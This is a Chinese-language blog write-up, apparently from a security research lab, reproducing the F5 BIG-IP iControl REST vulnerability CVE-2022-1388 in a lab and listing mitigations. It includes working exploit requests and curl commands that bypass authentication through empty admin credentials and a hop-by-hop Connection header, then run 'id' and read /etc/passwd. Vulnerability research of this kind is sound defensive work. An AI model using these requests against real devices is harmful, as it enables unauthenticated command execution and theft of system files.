CVE-2022-1388复现

CVE-2022-1388: BIG-IP iControl REST 漏洞

CVE-2022-1388: BIG-IP iControl REST 漏洞

0x00 影响

Impact

This vulnerability may allow an unauthenticated attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands, create or delete files, or disable services. There is no data plane exposure; this is a control plane issue only.

根据官方描述得知,该漏洞允许未授权的攻击者通过接口对BIG-IP系统访问,并能执行任意系统命令、创建、删除文件以及关闭服务。

产品分支受影响版本Fixes introduced in3漏洞威胁等级CVSSv3 评分
BIG-IP (all modules)17.xNone17.0.0严重9.8
16.x16.1.0 - 16.1.216.1.2.2
15.x15.1.0 - 15.1.515.1.5.1
14.x14.1.0 - 14.1.414.1.4.6
13.x13.1.0 - 13.1.413.1.5
12.x12.1.0 - 12.1.6官方无补丁
11.x11.6.1-11.6.5官方无补丁

0x01 复现

从官网https://downloads.f5.com/esd/productlines.jsp下载4个版本虚拟镜像,本地复现:

选择镜像需要在受影响版本内的虚拟机ova包,

image-20220510181303182.png
下载好的镜像,直接双击打卡导入,或者在虚拟机中选择导入均可:

image-20220510180934767.png

image-20220510181421031.png

导入完成后打开该虚拟机,需要获取该虚拟机的ip,终端输入root/default登录后输入ifconfig mgmt即可查看ip

image-20220510182122511.png

image-20220510182410390.png
然后在浏览器输入https://<ip>打开看到登录界面抓包即可

image-20220510182847547.png

参考https://packetstormsecurity.com/files/167007/F5-BIG-IP-Remote-Code-Execution.html的exp如下:

\# F5 BIG-IP RCE exploitation (CVE-2022-1388)  
​  
POST (1):   
​  
POST /mgmt/tm/util/bash HTTP/1.1  
Host: <redacted>:8443  
Authorization: Basic YWRtaW46  
Connection: keep-alive, X-F5-Auth-Token  
X-F5-Auth-Token: 0  
​  
{"command": "run" , "utilCmdArgs": " -c 'id' " }  
​  
curl commandliner:   
​  
$ curl -i -s -k -X $'POST'  
\-H $'Host: <redacted>:8443'   
\-H $'Authorization: Basic YWRtaW46'   
\-H $'Connection: keep-alive, X-F5-Auth-Token'   
\-H $'X-F5-Auth-Token: 0'   
\-H $'Content-Length: 52'   
\--data-binary $'{\\"command\\": \\"run\\" , \\"utilCmdArgs\\": \\" -c \\'id\\' \\" }\\x0d\\x0a'  
$'https://<redacted>:8443/mgmt/tm/util/bash' --proxy http://127.0.0.1:8080  
​  
​  
POST (2):  
​  
POST /mgmt/tm/util/bash HTTP/1.1  
Host: <redateced>:8443  
Authorization: Basic YWRtaW46  
Connection: keep-alive, X-F5-Auth-Token  
X-F5-Auth-Token: 0  
​  
{"command": "run" , "utilCmdArgs": " -c ' cat /etc/passwd' " }  
​  
curl commandliner:  
​  
$ curl -i -s -k -X $'POST'  
\-H $'Host: <redacted>:8443'   
\-H $'Authorization: Basic YWRtaW46' -H $'Connection: keep-alive, X-F5-Auth-Token'   
\-H $'X-F5-Auth-Token: 0'  
\--data-binary $'{\\"command\\": \\"run\\" , \\"utilCmdArgs\\": \\" -c \\' cat /etc/passwd\\' \\" }\\x0d\\x0a\\x0d\\x0a'  
$'https://<redacted>/mgmt/tm/util/bash' --proxy http://127.0.0.1:8080  

问题可能与使用空凭据admin:绕过了前端和后端身份验证有关,以及HTTP的 hop_by_hop请求头问题:

https://portswigger.net/research/top-10-web-hacking-techniques-of-2019-nominations-open

https://nathandavison.com/blog/abusing-http-hop-by-hop-request-headers

HTTP的 hop_by_hop请求头问题,大概意思就是讲:

请求还可以定义一组自定义的标头,通过将它们添加到标头中来逐跳处理Connection,如下所示:

Connection: close, X-Foo, X-Bar

在此示例中,我们要求代理将X-FooX-Bar作为逐跳处理,这意味着我们希望代理在传递请求之前将它们从请求中删除。

复现过程中发现只有14.x-16.x版本的请求头需要为Host:localhost才可以。

image-20220510185630802.png

image-20220510183248712.png

0x02 修复方案

建议升级只最新版本或可参考官方修复建议:https://support.f5.com/csp/article/K23605346Recommended Actions

在受影响的版本内可执行以下步骤以缓解攻击:

通过自身 IP 地址阻止 iControl REST 访问

通过管理界面阻止 iControl REST 访问

修改 BIG-IP httpd 配置

0x03 参考链接

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388

https://support.f5.com/csp/article/K23605346

https://packetstormsecurity.com/files/167007/F5-BIG-IP-Remote-Code-Execution.html

https://portswigger.net/research/top-10-web-hacking-techniques-of-2019-nominations-open

https://nathandavison.com/blog/abusing-http-hop-by-hop-request-headers

  • 发表于 2022-05-18 09:42:57
  • 阅读 ( 8713 )
  • 分类:漏洞分析

0 条评论

请先 登录 后评论
山石网科安研院
山石网科安研院

7 篇文章

站长统计